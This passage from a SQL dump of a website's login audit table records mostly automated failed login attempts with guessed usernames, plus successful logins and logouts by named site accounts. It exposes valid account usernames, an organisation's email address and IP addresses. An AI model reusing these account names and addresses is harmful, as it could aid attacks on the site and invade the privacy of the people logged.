(KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19204,117622,1694102227.689290,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19171,117261,1693955032.708460,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF4D2E865F,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Safari/537.36'),(19172,117262,1693955034.222632,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFFA2D2FA0A,'Mozilla/5.0 (Linux; Android 11; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.88 Mobile Safari/537.36'),(19173,117263,1693955036.236145,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF6EACAC69,'Mozilla/5.0 (Linux; Android 5.1.1; KFSUWI) AppleWebKit/537.36 (KHTML, like Gecko) Silk/94.4.4 like Chrome/94.0.4606.128 Safari/537.36'),(19174,117264,1693955039.766458,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF679F9B2E,'Mozilla/5.0 (Linux; Android 11; moto g stylus (2021)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19175,117266,1693958136.218530,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFFDDB2B055,'Mozilla/5.0 (Linux; Android 11; XQ-BQ62) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.88 Mobile Safari/537.36'),(19176,117267,1693958144.076529,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF2DEBA4E4,'Mozilla/5.0 (Linux; Android 9; SM-S767VL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 Mobile Safari/537.36'),(19177,117269,1693958148.142465,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF411490DA,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15'),(19211,117718,1694134427.359853,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF58D61385,'Mozilla/5.0 (Linux; Android 12; SM-G991U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(19212,117720,1694134904.058138,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF679AEE88,'Mozilla/5.0 (Linux; Android 9; SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(19187,117423,1694019189.413089,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF284D1460,'Mozilla/5.0'),(19188,117485,1694033843.344985,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19189,117503,1694047270.936813,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF5F6BA03C,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/97.0.4692.72 Mobile/15E148 Safari/604.1'),(19167,117247,1693932495.156354,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19168,117258,1693955026.979718,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF70049D83,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Mobile/15E148 DuckDuckGo/7 Safari/605.1.15'),(19198,117515,1694049766.032357,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF4114A2B9,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15'),(19199,117516,1694049768.854317,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF677DF199,'Mozilla/5.0 (Linux; Android 11; moto g stylus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(19200,117517,1694049770.450164,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF6BAA4315,'Mozilla/5.0 (Linux; Android 8.1.0; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(19201,117518,1694049772.612454,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFFB127DA8D,'Mozilla/5.0 (Linux; Android 11; SM-G975U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.62 Mobile Safari/537.36'),(19195,117512,1694049756.998440,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF681CE60A,'Mozilla/5.0 (Linux; Android 11; SM-A505U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19196,117513,1694049759.684174,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF7598C857,'Mozilla/5.0 (Linux; Android 9; LGL455DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19197,117514,1694049763.347703,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFFDEFFC818,'Mozilla/5.0 (Linux; Android 8.1.0; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(19193,117507,1694047290.064929,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFFDE801136,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1'),(19194,117508,1694047293.793597,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF75B8191E,'Mozilla/5.0 (Linux; Android 7.0; LG-LS777) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(19190,117504,1694047273.079832,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF737024C4,'Mozilla/5.0 (Linux; Android 12) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/97.0.4692.98 Mobile DuckDuckGo/5 Safari/537.36'),(19191,117505,1694047274.958343,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFFC33E0F8A,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A716U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(19192,117506,1694047287.434829,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF73545B37,'Mozilla/5.0 (Linux; Android 11; moto g stylus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(19213,117721,1694134905.973737,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF5BD7CADB,'Mozilla/5.0 (Linux; Android 12; Pixel 3 XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Mobile Safari/537.36'),(19214,117722,1694134909.698162,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF2974BD02,'Mozilla/5.0 (Linux; Android 9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Mobile Safari/537.36'),(19215,117723,1694134911.513280,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF5C578E47,'Mozilla/5.0 (Linux; Android 11; SM-N970U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(19216,117724,1694134913.700442,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF720658CA,'Mozilla/5.0 (X11; CrOS x86_64 13982.82.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.157 Safari/537.36'),(19217,117725,1694134915.268864,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFFC3707B43,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'),(19218,117726,1694134917.132456,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF681CE60A,'Mozilla/5.0 (Linux; Android 12; SM-G781U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19244,118028,1694386226.632937,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFFB7F51FAE,'Mozilla/5.0 (Linux; Android 11; BE2025) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(19245,118029,1694388035.320033,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF59700291,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15'),(19246,118030,1694388038.087119,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF3D8D007C,'Mozilla/5.0 (Linux; Android 12; SM-G996U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(19247,118031,1694388040.108481,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF4114A83A,'Mozilla/5.0 (Linux; Android 11; SM-A526U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(19248,118032,1694388042.957066,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF05BE19B6,'Mozilla/5.0 (Linux; Android 11; SM-G970U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19249,118033,1694388046.970758,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF67247AA3,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/81.0.4044.124 Mobile/15E148 Safari/604.1'),(19250,118034,1694388048.636458,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF5BCD82FC,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/96.0.4664.116 Mobile/15E148 Safari/604.1'),(19251,118035,1694388051.205893,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF7C1DDF58,'Mozilla/5.0 (Linux; Android 10; Nokia C2 Tennen) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(19252,118040,1694404427.865449,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFC1EFEBE7,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/190.1.416438978 Mobile/15E148 Safari/604.1'),(19253,118041,1694404430.604960,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFFABE8B823,'Mozilla/5.0 (Linux; Android 9; moto z3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(19254,118042,1694404433.627440,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF2D73FCBA,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_8_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148'),(19255,118043,1694404436.425109,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF01018AD9,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.62'),(19256,118046,1694412441.766721,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19222,117896,1694278955.388077,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19223,117897,1694286765.374359,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19224,117909,1694310661.904568,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFFBD0108CA,'Mozilla/5.0 (Linux; Android 5.1.1; SM-G530R7 Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36'),(19220,117811,1694215384.309681,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF966D94D8,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(19221,117855,1694250701.746273,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFB52B66CE,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(19225,117910,1694310664.173323,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF67D32523,'Mozilla/5.0 (Linux; Android 11; LM-V600) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(19226,117911,1694310667.000958,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF74D4959E,'Mozilla/5.0 (iPad; CPU OS 15_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/97.0.4692.72 Mobile/15E148 Safari/604.1'),(19274,118735,1694684487.500362,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF18E5AD65,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G781U1) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(19275,118786,1694703675.460204,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF0EE2E70E,'Mozilla/5.0 (Linux; Android 11; SM-G781V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(19276,118787,1694703748.661244,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFFC11360C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 OPR/82.0.4227.58'),(19499,128532,1698158549.532188,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19533,129520,1698450553.804195,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFACE99088,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19534,129521,1698450564.630364,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFACE99088,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19239,118023,1694386202.710242,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF679F9B31,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Snapchat/11.60.0.35 (like Safari/8612.1.27.0.31, panda)'),(19240,118024,1694386205.656308,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFFBE736802,'Mozilla/5.0 (Linux; Android 12; SM-A526U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(19241,118025,1694386208.350502,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF0EA14461,'Mozilla/5.0 (Linux; Android 10; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(19242,118026,1694386221.453351,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF55AC3C07,'Mozilla/5.0 (Linux; Android 11; moto g power (XT2041DL)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(19243,118027,1694386223.602864,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF411485DC,'Mozilla/5.0 (iPhone; CPU iPhone OS 13_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Mobile/15E148 Safari/604.1'),(19305,119140,1694895685.109421,1,'loginFailInvalidUsername','isiah',0,0x00000000000000000000FFFFACAD43ED,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19303,119138,1694895684.739331,1,'loginFailInvalidUsername','isiah',0,0x00000000000000000000FFFFACAD43ED,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19304,119139,1694895684.923993,1,'loginFailInvalidUsername','isiah',0,0x00000000000000000000FFFFACAD43ED,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19283,118891,1694794323.765777,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2E1DE012,'Mozilla/5.0 (Linux; Android 11; LM-K500) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19284,118908,1694802883.422651,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF9448D6F5,'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(19285,118915,1694806092.612670,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19286,118919,1694806859.084794,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19287,118920,1694806978.492782,0,'loginOK','emerg-user18',5,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19288,118921,1694807189.717691,0,'logout','emerg-user18',5,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19289,119007,1694834639.394093,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFC5FBC08F,'Mozilla/5.0 (Linux; Android 12; SM-N986U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(19258,118163,1694453455.094685,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19259,118191,1694464496.454296,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19263,118323,1694573966.901722,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19267,118727,1694683856.585810,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF1718463E,'Mozilla/5.0 (iPad; CPU OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/187.0.410885375 Mobile/15E148 Safari/604.1'),(19268,118728,1694683858.562294,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF676F36BA,'Mozilla/5.0 (Linux; Android 11; Nokia X100) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.210 Mobile Safari/537.36'),(19264,118723,1694683837.491590,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF5928F690,'Mozilla/5.0 (Linux; Android 11; moto g power (XT2041DL)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19265,118724,1694683840.071662,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFFC86CBE4A,'Mozilla/5.0 (Linux; Android 11; moto g stylus (2021)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(19260,118297,1694538148.562060,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19261,118298,1694540713.599294,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19262,118315,1694572936.655207,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19266,118725,1694683853.258166,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF70146AE4,'Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(19494,128324,1698087086.701813,1,'loginFailInvalidUsername','individualise',0,0x00000000000000000000FFFF39804123,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19495,128325,1698087087.031660,1,'loginFailInvalidUsername','individualise',0,0x00000000000000000000FFFF39804123,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19496,128454,1698117483.944919,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19497,128457,1698118590.954617,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19498,128473,1698127331.045308,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D3DB892,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0'),(19290,119021,1694839385.893359,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFFB1699079,'Mozilla/5.0 (Linux; Android 8.1.0; SM-N960U Build/M1AJQ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.91 Mobile Safari/537.36'),(19291,119039,1694845444.927780,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF6E2C7706,'Mozilla/5.0 (iPad; CPU OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/190.1.416438978 Mobile/15E148 Safari/604.1'),(19277,118794,1694710601.153883,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF4AF9EC7E,'Mozilla/5.0'),(19278,118862,1694753979.008610,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFC293A790,'Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-F711U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(19279,118864,1694757964.801275,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF8FC6C1C7,'Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Mobile/15E148 Safari/604.1'),(19280,118886,1694791035.888357,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19281,118889,1694793792.375511,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF75F485BA,'Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G960U1) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(19282,118890,1694793972.967265,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19292,119058,1694861586.919843,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF5B86D4B0,'Mozilla/5.0 (Linux; Android 11; Mi Note 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19293,119065,1694864411.545364,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF67068592,'Mozilla/5.0 (Linux; Android 11; SM-G988U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(19306,119141,1694895685.303967,1,'loginFailInvalidUsername','isiah',0,0x00000000000000000000FFFFACAD43ED,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19307,119265,1694908885.370646,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF6795E82A,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/184.2.407130758 Mobile/15E148 Safari/604.1'),(19308,119268,1694912291.453105,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFAD52EC16,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Mobile/15E148 Safari/604.1'),(19309,119334,1694933049.899680,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF4AD039FC,'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(19333,120370,1695215395.309681,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF5E173DA5,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(19339,120410,1695302564.390254,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFCBBD9C78,'Mozilla/5.0 (Linux; Android 12) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/96.0.4664.104 Mobile DuckDuckGo/5 Safari/537.36'),(19340,120552,1695308298.677888,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19347,120569,1695342532.805369,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF4AF9F2C8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19348,120570,1695342533.209942,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF4AF9F2C8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19349,120571,1695344256.567970,0,'loginOK','john-admin-96',15,0x00000000000000000000FFFFAE1080B0,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19350,120572,1695348595.117769,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF2D4269FD,'Mozilla/5.0 (Linux; Android 10; SM-G986U Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile 